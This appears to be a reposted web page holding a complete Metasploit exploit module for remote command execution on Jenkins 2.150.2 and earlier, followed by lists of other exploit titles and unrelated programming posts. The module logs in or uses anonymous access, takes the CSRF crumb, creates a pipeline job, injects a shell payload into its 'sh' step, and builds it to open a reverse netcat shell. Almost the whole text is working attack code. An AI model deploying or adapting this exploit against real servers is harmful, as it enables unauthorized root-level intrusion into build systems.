##

# This module requires Metasploit: https://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})

        super(update_info(info,

          'Name'           => 'Jenkins <= 2.150.2 Remote Command Execution via Node JS (Metasploit)',

          'Description'    => %q{

                  This module can run commands on the system using Jenkins users who has JOB creation and BUILD privileges.

                  The vulnerability is exploited by a small script prepared in NodeJS.

                  The sh parameter allows us to run commands.

                  Sample script:

                                node {

                                      sh "whoami"

                                }

                  In addition, ANONYMOUS users also have the authority to JOB create and BUILD by default.

                  Therefore, all users without console authority can run commands on the system as root privilege.

          },

          'Author'         => [

            'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module

          ],

          'License'        => MSF_LICENSE,

          'References'     =>

            [

              ['URL', 'https://pentest.com.tr/exploits/Jenkins-Remote-Command-Execution-via-Node-JS-Metasploit.html']

            ],

          'Privileged'     => true,

          'Payload'        =>

            {

              'DisableNops' => true,

              'Space'       => 512,

              'Compat'      =>

                {

                  'PayloadType' => 'cmd',

                  'RequiredCmd' => 'reverse netcat generic perl ruby python telnet',

                }

            },

          'Platform'       => 'unix',

          'Arch'           => ARCH_CMD,

          'Targets'        => [[ 'Jenkins <= 2.150.2', { }]],

          'DisclosureDate' => 'Feb 11 2019',

          'DefaultTarget'  => 0,

          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }))

          register_options(

            [

                OptString.new('USERNAME', [ false, 'The username to authenticate as', '' ]),

                OptString.new('PASSWORD', [ false, 'The password for the specified username', '' ]),

                OptString.new('PATH', [ true, 'The path to jenkins', '/' ]),

            ], self.class)

    end

##

# Jenkins activity check

##

    def check

        res = send_request_cgi({'uri' => "/login"})

        if res and res.headers.include?('X-Jenkins')

            return Exploit::CheckCode::Detected

        else

            return Exploit::CheckCode::Safe

        end

    end

    def exploit

        print_status('Attempting to login to Jenkins dashboard')

        res = send_request_cgi({'uri' => "/script"})

        if not (res and res.code)

            fail_with(Exploit::Failure::Unknown)

        end

        sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]

        @cookie = "#{sessionid}"

    print_status("#{sessionid}")

        if res.code != 200

            print_status('Logging in...')

##

# Access control and information

##

            res = send_request_cgi({

                'method'    => 'POST',

                'uri'       => "/j_acegi_security_check",

                'cookie'    => @cookie,

                'vars_post' =>

                    {

                        'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),

                        'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),

                        'Submit'     => 'Sign+in'

                    }

            })

            if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/

                print_error('User Login failed. If anonymous login is active, exploit will continue.')

            end

        else

            print_status('No authentication required, skipping login...')

        end

##

# Check Crumb for create pipeline

##

    cookies = res.get_cookies

        res = send_request_cgi({

        'method' => 'GET',

            'uri' => "/view/all/newJob",

            'cookie'  => cookies

        })

        html = res.body

        if html =~ /Jenkins-Crumb/

          print_good("Login Successful")

        else

          print_status("Service found, but login failed")

          exit 0

        end

    crumb = res.body.split('Jenkins-Crumb')[1].split('");<')[0].split('"').last

        print_status("Jenkins-Crumb: #{crumb}")

##

# Create Pipeline

##

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/view/all/createItem",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'name' => "cmd",

                    'mode' => "org.jenkinsci.plugins.workflow.job.WorkflowJob",

                    'from' => "",

                    'Jenkins-Crumb' => "#{crumb}",

                    'json' => "%7B%22name%22%3A+%22cmd%22%2C+%22mode%22%3A+%22org.jenkinsci.plugins.workflow.job.WorkflowJob%22%2C+%22from%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%22528f90f71b2d2742299b4daf503130ac%22%7"

                }

        })

##

# Configure Pipeline

##

        shell = payload.encoded

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/job/cmd/configSubmit",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'description' => "cmd",

                    'Jenkins-Crumb' => "#{crumb}",

                    'json' => "{\"description\": \"cmd\", \"properties\": {\"stapler-class-bag\": \"true\", \"hudson-security-AuthorizationMatrixProperty\": {}, \"jenkins-model-BuildDiscarderProperty\": {\"specified\": false, \"\": \"0\", \"strategy\": {\"daysToKeepStr\": \"\", \"numToKeepStr\": \"\", \"artifactDaysToKeepStr\": \"\", \"artifactNumToKeepStr\": \"\", \"stapler-class\": \"hudson.tasks.LogRotator\", \"$class\": \"hudson.tasks.LogRotator\"}}, \"org-jenkinsci-plugins-workflow-job-properties-DisableConcurrentBuildsJobProperty\": {\"specified\": false}, \"org-jenkinsci-plugins-workflow-job-properties-DisableResumeJobProperty\": {\"specified\": false}, \"com-coravy-hudson-plugins-github-GithubProjectProperty\": {}, \"org-jenkinsci-plugins-workflow-job-properties-DurabilityHintJobProperty\": {\"specified\": false, \"hint\": \"MAX_SURVIVABILITY\"}, \"org-jenkinsci-plugins-pipeline-modeldefinition-properties-PreserveStashesJobProperty\": {\"specified\": false, \"buildCount\": \"1\"}, \"hudson-model-ParametersDefinitionProperty\": {\"specified\": false}, \"jenkins-branch-RateLimitBranchProperty$JobPropertyImpl\": {}, \"org-jenkinsci-plugins-workflow-job-properties-PipelineTriggersJobProperty\": {\"triggers\": {\"stapler-class-bag\": \"true\"}}}, \"disable\": false, \"hasCustomQuietPeriod\": false, \"quiet_period\": \"5\", \"displayNameOrNull\": \"\", \"\": \"0\", \"definition\": {\"script\": \"node {\\n    sh \\\"#{shell}\\\"\\n}\", \"\": [\"try sample Pipeline...\", \"\\u0001\\u0001\"], \"sandbox\": true, \"stapler-class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\", \"$class\": \"org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition\"}, \"core:apply\": \"\", \"Jenkins-Crumb\": \"#{crumb}\"}",

                    'Submit' => "Save"

                }

        })

        if res.code == 302

          print_good("Pipeline was created and Node JS code was integrated.")

        end

##

# Build Pipeline and Execute payload

##

        print_status("Trying to get remote shell...")

        res = send_request_cgi({

        'method' => 'POST',

            'uri' => "/job/cmd/build?delay=0sec",

            'cookie'  => cookies,

            'vars_post' =>

                {

                    'Jenkins-Crumb' => "#{crumb}"

                }

        })

    handler

    end

end

##

# End

##

[EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)的更多相关文章

  1. [EXP]Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  3. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  4. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

  6. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  7. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

  8. struts2 CVE-2013-1965 S2-012 Showcase app vulnerability allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  9. struts2 CVE-2013-2251 S2-016 action、redirect code injection remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

随机推荐

  1. phpexcel获取excel表格内容

    excel表格式: 代码: $objPHPExcel=PHPExcel_IOFactory::load($excelFilePath);//$file_url即Excel文件的路径 $sheet=$o ...

  2. NodeJs第3方包说明

    formidable 作用:实现简单文件上传 var formidable = require('formidable'); var form = new formidable.IncomingFor ...

  3. GCD - Extreme (II) (欧拉函数妙用)

    https://cn.vjudge.net/problem/UVA-11426 题意:求 解题思路:我们可以定义一个变量dis[n],dis[n]意为1~(n-1)与n的gcd(最大公约数)的总和,那 ...

  4. [leetcode]716. Max Stack 最大栈

    Design a max stack that supports push, pop, top, peekMax and popMax. push(x) -- Push element x onto ...

  5. python基础(二)列表与字典

    列表list-数组stus=['苹果','香蕉','橘子','红枣',111.122,]# 下标 0 1 2 3 4#下标,索引,角标#print(stus[4]) #st=[]#空list#st=l ...

  6. Linux命令列内容

    命令列内容: 一般模式 移动光标 [ctrl]+[f] 屏幕[向前]移动一页 [ctrl]+[b] 屏幕[向后]移动一页 0 这是数字0:移动到这一行的最前面字符处 $ 移动到这一行的最后面字符处 G ...

  7. 线程的使用方法start run sleep join

    今天回顾了Java的线程的一些知识 例1:下面代码存有详细的解释 主要是继承Thread类与实现Runnable接口 以及start()和run()方法 package com.date0607; / ...

  8. Linux系统中的tar命令

    时间一长什么东西都容易忘记,尤其是一些不常用的东西忘记的更快,所以避免忘记,就记录下来,可以方面使用的时候查询.Tar命令在linux系统中算是一个比较重要的命令,今天就针对该命令进行总结一下. 1. ...

  9. ImportError: No module named MySQLdb问题的解决

    今天在windows上撸python代码,遇到ImportError: No module named MySQLdb的问题,遂赶紧pip install mysql-python,结果还是不行,查看 ...

  10. java多线程系列11 juc包下的队列

    队列分为两类  阻塞队列 BlockingQueue提供如下两个支持阻塞的方法:   (1)put(E e): 尝试把e元素放如BlockingQueue中,如果该队列的元素已满,则阻塞该线程.   ...